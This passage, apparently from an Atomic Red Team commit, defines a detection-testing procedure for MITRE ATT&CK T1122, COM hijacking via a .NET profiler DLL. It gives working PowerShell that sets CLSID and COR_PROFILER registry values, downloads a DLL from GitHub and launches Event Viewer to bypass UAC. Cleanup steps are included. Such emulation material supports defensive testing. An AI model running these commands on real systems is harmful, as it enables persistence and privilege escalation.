profiler DLL will still execute each time the CLR is loaded by a process,
however, the notepad process will not execute with high integrity. \n"
supported_platforms:
- windows
input_arguments:
file_name:
description: profiler DLL
type: Path
default: PathToAtomicsFolder\T1122\bin\T1122x64.dll
clsid_guid:
description: custom clsid guid
type: String
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: "#{file_name} must be present"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}'
get_prereq_command: |-
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
executor:
name: powershell
elevation_required: false
command: |
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5
cleanup_command: |-
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
T1090:
technique:
x_mitre_data_sources:
atomics/T1122/T1122.md
+67
View File
@@ -0,0 +1,67 @@
# T1122 - Component Object Model Hijacking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1122)
<blockquote>The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</blockquote>
## Atomic Tests
- [Atomic Test #1 - COM Hijack Leveraging .NET profiler DLL](#atomic-test-1---com-hijack-leveraging-net-profiler-dll)
<br/>
## Atomic Test #1 - COM Hijack Leveraging .NET profiler DLL
Creates environment variables and CLSID to enable a .NET profiler. The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
#### Attack Commands: Run with `powershell`!
```powershell
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5
```
#### Cleanup Commands:
```powershell
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
```
<br/>